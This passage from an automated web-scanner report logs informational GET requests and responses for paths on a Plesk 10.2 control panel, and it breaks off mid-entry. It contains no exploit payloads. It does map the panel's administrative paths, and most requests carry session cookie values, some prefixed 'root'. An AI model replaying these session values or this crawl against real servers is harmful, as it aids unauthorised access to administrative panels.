12.217. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/icons/tabs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/icons/tabs/

Request

GET /skins/default/plesk/icons/tabs/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 15:27:35 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 15:27:35 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.218. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/images/

Request

GET /skins/default/plesk/images/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 404 Not Found
Connection: close
Expires: Mon, 24 Oct 2011 14:16:01 GMT
Cache-Control: max-age=2592000
Content-Type: text/html
Content-Length: 345
Date: Sat, 24 Sep 2011 14:16:01 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

12.219. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/

Request

GET /smb/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/?start_page=%2Fadmin%2Fhome%2Fadmin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:00:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:00:40 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:00:40 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.220. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/account/

Request

GET /smb/account/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:19:36 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:19:40 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:19:40 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.221. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/account/create-subscription

Request

GET /smb/account/create-subscription HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:25:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:25:29 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:25:30 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.222. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/power-mode-logout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/account/power-mode-logout

Request

GET /smb/account/power-mode-logout HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription?redirectUrl=%2F
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:00:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:00:40 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:00:40 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.223. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/admin-home

Request

GET /smb/admin-home HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en-US

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 12:14:06 GMT
Expires: Fri, 28 May 1999 00:00:00 GMT
Cache-Control: max-age=2592000
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 12:14:06 GMT
Pragma: no-cache
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-type: text/html
Date: Sat, 24 Sep 2011 12:14:06 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.224. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/admin-home/

Request

GET /smb/admin-home/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:23:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:23:26 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:23:26 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.225. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home/disable-featured-applications-promo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/admin-home/disable-featured-applications-promo

Request

GET /smb/admin-home/disable-featured-applications-promo HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:23:27 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:23:36 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:23:36 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.226. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home/installed-applications/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/admin-home/installed-applications/

Request

GET /smb/admin-home/installed-applications/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:58:24 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:58:25 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:58:25 GMT
Server: sw-cp-server
Content-Length: 128

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
$('applicationEntryPoints').hide();
});
//]]>
</script>

12.227. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/auth/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/auth/

Request

GET /smb/auth/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:22:50 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:22:52 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:22:52 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.228. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/auth/logout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/auth/logout

Request

GET /smb/auth/logout HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:25:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:25:30 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:25:30 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.229. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/

Request

GET /smb/help/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:22:26 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:22:35 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:22:35 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.230. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/

Request

GET /smb/help/redirect/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:22:13 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:22:17 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:22:17 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.231. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/

Request

GET /smb/help/redirect/controller-name/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:21:48 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:21:56 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:21:56 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.232. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/account/

Request

GET /smb/help/redirect/controller-name/account/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
